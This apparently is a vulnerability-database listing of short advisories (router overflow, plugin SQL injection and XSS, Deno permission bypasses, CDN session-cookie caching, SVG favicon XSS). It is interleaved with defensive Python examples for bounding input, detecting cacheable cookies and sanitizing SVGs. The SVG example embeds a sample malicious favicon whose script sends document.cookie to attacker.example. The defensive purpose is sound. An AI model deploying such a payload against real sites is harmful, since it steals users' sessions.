30384 matches found
PT-2025-24132 · Unknown · Email Subscribe Form
Name of the Vulnerable Software and Affected Versions: Elastic Email Subscribe Form versions 1.2.2 and earlier Description: The issue is related to a Missing Authorization vulnerability in the Elastic Email Subscribe Form, which allows exploitation due to incorrectly configured access control...
PT-2025-24398 · Tenda · Tenda Ac5
Name of the Vulnerable Software and Affected Versions: Tenda AC5 version 15.03.06.47 Description: A critical issue affects the function formSetRebootTimer of the file /goform/SetRebootTimer. Manipulation of the argument rebootTime leads to a stack-based...
PT-2025-24071 · Unknown · Code-Projects Traffic Offense Reporting System
Name of the Vulnerable Software and Affected Versions: code-projects Traffic Offense Reporting System version 1.0 Description: An issue was found in the code-projects Traffic Offense Reporting System, affecting unknown functionality of the file /save-reported.php. The manipulation of the...
PT-2025-24040 · WordPress · Runners Log
Name of the Vulnerable Software and Affected Versions: Runners Log plugin for WordPress versions up to, and including, 3.9.2 Description: The issue is related to Stored Cross-Site Scripting via the plugin's 'runnerslog' shortcode due to insufficient input sanitization and output escaping on...
PT-2025-24031 · WordPress · Wp Online Users Stats
Name of the Vulnerable Software and Affected Versions: WP Online Users Stats plugin for WordPress versions up to and including 1.0.0 Description: The issue allows authenticated attackers with Editor-level access or higher to inject additional SQL queries into existing ones, potentially extracting...
PT-2025-24054 · Apache · Apache
Name of the Vulnerable Software and Affected Versions: Apache versions prior to the fixed version Description: Missing protection against path traversal allows access to any file on the server, giving an attacker unauthorized read access to files outside the intended directory. Recommendations: For...
PT-2025-24015 · Sourcecodester · Sourcecodester Student Management System
Name of the Vulnerable Software and Affected Versions: SourceCodester Student Result Management System version 1.0 Description: A vulnerability was found in the Subjects Page component, specifically in an unknown function of the file /script/academic/subjects. The manipulation of the Subject...
PT-2025-24216 · Sergiotrinity · Trinity Audio
Name of the Vulnerable Software and Affected Versions: sergiotrinity Trinity Audio versions through 5.20.0 Description: The issue is related to a Missing Authorization vulnerability, which allows exploitation due to incorrectly configured access control security levels. Recommendations: For versions...
CVE-2025-48999
DataEase is an open source business intelligence and data visualization tool. A bypass of CVE-2025-46566's patch exists in versions prior to 2.10.10. In a malicious payload, getUrlType retrieves hostName. Since the judgment statement returns false, it will not enter the if statement and will not ...
CVE-2025-49000
InvenTree is an Open Source Inventory Management System. Prior to version 0.17.13, the skip field in the built-in label-sheet plugin lacks an upper bound, so a large value forces the server to allocate an enormous Python list. This lets any authenticated label-printing user trigger a...
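The mechanism above (an integer field with no upper bound driving a server-side allocation), as an added example that is not InvenTree's code: a hypothetical label-sheet layout in which `skip` pre-fills a list, beside a version that bounds the field by the sheet capacity and derives slot positions arithmetically, so memory use depends only on the number of labels. The sheet geometry (3 columns by 8 rows) and the function names are constructed assumptions.

```python
"""Bounded vs. unbounded 'skip' handling for a label-sheet layout.

Added illustration, not InvenTree's code. The geometry below is assumed.
"""
from dataclasses import dataclass

# Constructed sheet geometry (assumption): 3 columns x 8 rows per sheet.
COLS = 3
ROWS = 8
PER_SHEET = COLS * ROWS


@dataclass(frozen=True)
class Slot:
    sheet: int
    row: int
    col: int


def _slot(index):
    """Map a linear label index to (sheet, row, col) by arithmetic only."""
    return Slot(index // PER_SHEET, (index % PER_SHEET) // COLS, index % COLS)


def layout_unbounded(labels, skip):
    """Vulnerable pattern: 'skip' is only checked to be non-negative, then
    used to pre-fill a list. A request with skip=10**9 allocates roughly
    8 GB of pointers before any label is drawn (do not call with large skip)."""
    if skip < 0:
        raise ValueError("skip must be >= 0")
    cells = [None] * skip + list(labels)  # allocation size driven by user input
    return [(label, _slot(i)) for i, label in enumerate(cells) if label is not None]


def layout_bounded(labels, skip):
    """Hardened: reject non-integers and any skip outside [0, PER_SHEET - 1]
    (skipping a whole sheet or more is never meaningful), then compute each
    slot from skip + n, so nothing is allocated per skipped position."""
    if not isinstance(skip, int) or isinstance(skip, bool):
        raise TypeError("skip must be an integer")
    if not 0 <= skip < PER_SHEET:
        raise ValueError(f"skip must be in [0, {PER_SHEET - 1}]")
    return [(label, _slot(skip + n)) for n, label in enumerate(labels)]


if __name__ == "__main__":
    print(layout_bounded(["A", "B"], 23))  # B wraps onto the second sheet
```

The two functions agree for small `skip`, which is what a regression test should check after adding the bound; the difference is only in what an attacker-chosen value can make the server do.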
Exploit for CVE-2025-49113
CVE-2025-49113 PoC Repository Overview of CVE-2025-49113 C...
Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
Summary Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network. Details Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code...
PT-2025-23935 · Unknown · Freefloat Ftp Server
Name of the Vulnerable Software and Affected Versions: FreeFloat FTP Server version 1.0 Description: A critical issue affects the RESTART Command Handler component, leading to a buffer overflow. This can be exploited remotely. The issue has been publicly disclosed. Recommendations: For FreeFloat...
PT-2025-23928 · Unknown · Phpgurukul Complaint Management System
Name of the Vulnerable Software and Affected Versions: PHPGurukul Complaint Management System version 2.0 Description: A critical issue has been found in the PHPGurukul Complaint Management System, affecting some unknown functionality of the file /user/register-complaint.php. The manipulation of...
PT-2025-23926 · Joomla · Rsmail!
Name of the Vulnerable Software and Affected Versions: RSMail! component versions 1.19.20 through 1.22.26 for Joomla Description: A stored XSS issue was discovered in the RSMail! component for Joomla, where user-supplied input is not properly sanitized before being stored and rendered within the...
PT-2025-23915 · Unknown · Phpgurukul Complaint Management System
Name of the Vulnerable Software and Affected Versions: PHPGurukul Complaint Management System version 2.0 Description: A critical issue was found in the PHPGurukul Complaint Management System, affecting some unknown functionality of the file /admin/edit-state.php. The manipulation of the...
PT-2025-23905 · Radare2 · Radare2
Name of the Vulnerable Software and Affected Versions: Radare2 version 5.9.9 Description: A vulnerability was found in Radare2 and classified as problematic. This issue affects the function r_cons_context_break_pop in the library /libr/cons/cons.c of the component radiff2. The manipulation of the...
CVE-2025-48935
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 2.2.0 and prior to version 2.2.5, it is possible to bypass Deno's read/write permission check for database files by using an ATTACH DATABASE statement. Version 2.2.5 contains a patch for the issue...
CVE-2025-48947 NextJS-Auth0 SDK Vulnerable to CDN Caching of Session Cookies
The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. In Auth0 Next.js SDK versions 4.0.1 through 4.6.0, session cookies set by auth0.middleware may be cached by CDNs due to missing Cache-Control headers. Three preconditions must be met in order for...
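A check for the condition described above (a response that sets a session cookie but carries no Cache-Control directive that keeps it out of a shared cache), as an added example that is not the Auth0 SDK's code. It approximates the RFC 9111 storability rules: `no-store` or `private` forbids shared-cache storage; explicit freshness (`public`, `max-age`, `s-maxage`, `Expires`) or a heuristically cacheable status code permits it. Whether a given CDN actually stores such a response is configuration-dependent, which is why the advisory lists preconditions; this check only tells you the response did nothing to prevent it. The sample header sets are constructed.

```python
"""Flag responses whose Set-Cookie could be stored by a shared cache (CDN).

Added example, not the Auth0 SDK's code. Headers are lists of (name, value)
pairs so repeated Set-Cookie headers survive.
"""

# Status codes RFC 9110 defines as heuristically cacheable (storable with no
# explicit freshness information).
HEURISTICALLY_CACHEABLE = {200, 203, 204, 206, 300, 301, 308, 404, 405, 410, 414, 501}


def _has(headers, name):
    return any(k.lower() == name for k, _ in headers)


def _cache_control(headers):
    """Parse all Cache-Control headers into {directive: value}, case-insensitively."""
    raw = ",".join(v for k, v in headers if k.lower() == "cache-control")
    directives = {}
    for part in raw.split(","):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def shared_cache_may_store(status, headers):
    """Return (storable, reason) for a shared cache following RFC 9111 section 3."""
    cc = _cache_control(headers)
    if "no-store" in cc:
        return False, "no-store"
    if "private" in cc:
        return False, "private"
    if "public" in cc or "s-maxage" in cc or "max-age" in cc:
        return True, "explicit freshness"
    if _has(headers, "expires"):
        return True, "Expires"
    if status in HEURISTICALLY_CACHEABLE:
        return True, "heuristic freshness"
    return False, "no freshness information"


def leaks_session_cookie(status, headers):
    """True when the response sets a cookie and a shared cache may store it,
    i.e. the next visitor could be handed someone else's session."""
    storable, _ = shared_cache_may_store(status, headers)
    return _has(headers, "set-cookie") and storable


def harden(headers):
    """Middleware-style fix: whenever Set-Cookie is present, replace any
    Cache-Control/Expires with 'private, no-store'. Returns a new list."""
    if not _has(headers, "set-cookie"):
        return list(headers)
    kept = [(k, v) for k, v in headers if k.lower() not in ("cache-control", "expires")]
    kept.append(("Cache-Control", "private, no-store"))
    return kept


# Constructed sample: what a login-callback response might look like.
SAMPLE_RESPONSE = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "appSession=opaque-value; Path=/; HttpOnly; Secure; SameSite=Lax"),
]
```

Run `leaks_session_cookie(200, SAMPLE_RESPONSE)` against captured responses from a CDN-fronted deployment; anything returning True needs the `harden` treatment (or the equivalent header in the framework's middleware) before the CDN sees it.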
CVE-2025-31136
FreshRSS before 1.26.2 is vulnerable to a cross-site scripting (XSS) issue in f.php triggered by SVG favicons downloaded from attacker-controlled feeds. The XSS occurs when the favicon contains unsanitized <script> tags and the page lacks a Content Security Policy; an attacker can embed a malici...
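The hazard above is an SVG fetched from an untrusted feed and later served as a document, where any script-capable content in it runs in the serving site's origin. As an added example that is not FreshRSS's code, the following scans an SVG for such content (script and foreignObject elements, on* event attributes, href/xlink:href with a javascript: or data: scheme) and optionally strips it with the standard library XML parser. The malicious favicon and the attacker host are constructed; the element and attribute lists are the author's assumptions about what counts as active content, not an exhaustive SVG sanitizer specification.

```python
"""Scan and strip script-capable content from an SVG favicon.

Added example, not FreshRSS's code. Uses xml.etree; in production parse
untrusted XML with defusedxml (entity expansion) and keep serving the file
with a restrictive Content-Security-Policy as defence in depth.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Assumed lists of active content (lower-cased local names).
ACTIVE_ELEMENTS = {"script", "foreignobject"}
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def _unsafe_url(value):
    # Browsers ignore whitespace/control characters inside a scheme, so drop
    # them before comparing ("java\tscript:" is still javascript:).
    compact = "".join(ch for ch in value if ch > " ").lower()
    return compact.startswith(DANGEROUS_SCHEMES)


def _bad_attrs(el):
    for attr, value in el.attrib.items():
        if _local(attr).startswith("on"):
            yield attr, f"event handler {_local(attr)}"
        elif attr in URL_ATTRS and _unsafe_url(value):
            yield attr, f"{_local(attr)} with unsafe scheme"


def scan_svg(svg_bytes):
    """Return [(element, reason), ...] for every active item found."""
    root = ET.fromstring(svg_bytes)
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append((tag, "active element"))
        findings.extend((tag, reason) for _, reason in _bad_attrs(el))
    return findings


def sanitize_svg(svg_bytes):
    """Return the SVG with active elements and attributes removed."""
    root = ET.fromstring(svg_bytes)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    for parent in list(root.iter()):          # snapshot: we mutate while walking
        for child in list(parent):
            if _local(child.tag) in ACTIVE_ELEMENTS:
                parent.remove(child)
    for el in root.iter():
        for attr, _ in list(_bad_attrs(el)):
            del el.attrib[attr]
    return ET.tostring(root)


# Constructed sample of a hostile favicon (attacker.example is made up).
MALICIOUS_FAVICON = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(2)"><circle r="8"/></a>
  <circle cx="8" cy="8" r="8" fill="steelblue"/>
</svg>"""

if __name__ == "__main__":
    for finding in scan_svg(MALICIOUS_FAVICON):
        print(*finding)
    print(sanitize_svg(MALICIOUS_FAVICON).decode())
```

For a feed reader the simpler policy is usually to reject any favicon that `scan_svg` flags rather than repair it, and in either case to serve the stored file with a Content-Security-Policy such as `default-src 'none'`, so that a bypass of the scanner still cannot run script in the application's origin.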